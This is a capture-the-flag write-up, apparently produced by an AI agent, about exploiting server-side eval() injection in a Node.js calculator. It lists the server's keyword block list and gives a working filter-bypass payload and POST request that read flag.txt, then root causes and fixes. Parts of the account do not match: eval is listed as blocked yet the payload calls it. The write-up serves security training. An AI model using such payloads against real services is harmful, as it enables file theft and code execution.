Calculator
let's do some math
dedicated to BOUSLAA (nvm)
Connection info: http://ctf.nexus-security.club:3067/
Author: CH@FX
Writeup written by AI agent:
Web Calculator CTF Solution
Vulnerability Analysis
The web calculator application has a server-side code injection vulnerability in its /calculate endpoint. The application evaluates mathematical expressions using JavaScript's eval() function with insufficient input validation.
Client-side Protections
The frontend implements basic client-side filtering that blocks:
- Quotes: ' "
- Brackets: [ ] { }
- These are easily bypassed since they are enforced only on the client side
Server-side Filtering
The server blocks several keywords, including:
- process
- require
- global
- constructor
- prototype
- eval
- Function
- child_process
- fs
Bypass Technique
The key bypass was using template literals to construct blocked strings:
- Used template literals to concatenate string parts, e.g. ${`fun`}${`ction`}
- Used eval() to execute the constructed code
- Accessed Node.js modules through process.mainModule.require()
Exploit Payload
eval(`Buffer.from(${`${`requir`}${`e`}`}(\"fs\").readFileSync(\"flag.txt\",\"utf8\")).toString()`)
This payload:
- Uses template literals to bypass the require keyword filter
- Imports the fs module
- Reads flag.txt from the filesystem
- Uses Buffer.from() to return the content as a string
Execution
Sent a POST request to /calculate with the following JSON body (the closing backtick of the template literal had been garbled into a double quote; it is restored here to match the payload above):
{"expr":"eval(`Buffer.from(${`${`requir`}${`e`}`}(\"fs\").readFileSync(\"flag.txt\",\"utf8\")).toString()`)"}
Result
Successfully retrieved the flag: nexus{7h1s_1s_no7_3v4l_Th1s_15_3v1lllllllllllllllllll}
Root Cause
The vulnerability stems from:
1. Use of eval() on user input
2. Insufficient server-side input sanitization
3. Predictable keyword filtering that can be bypassed with string concatenation
4. Node.js environment with filesystem access
Remediation
- Replace eval() with a proper mathematical expression parser
- Implement server-side input validation
- Use a sandboxed environment for expression evaluation
- Remove or restrict access to Node.js modules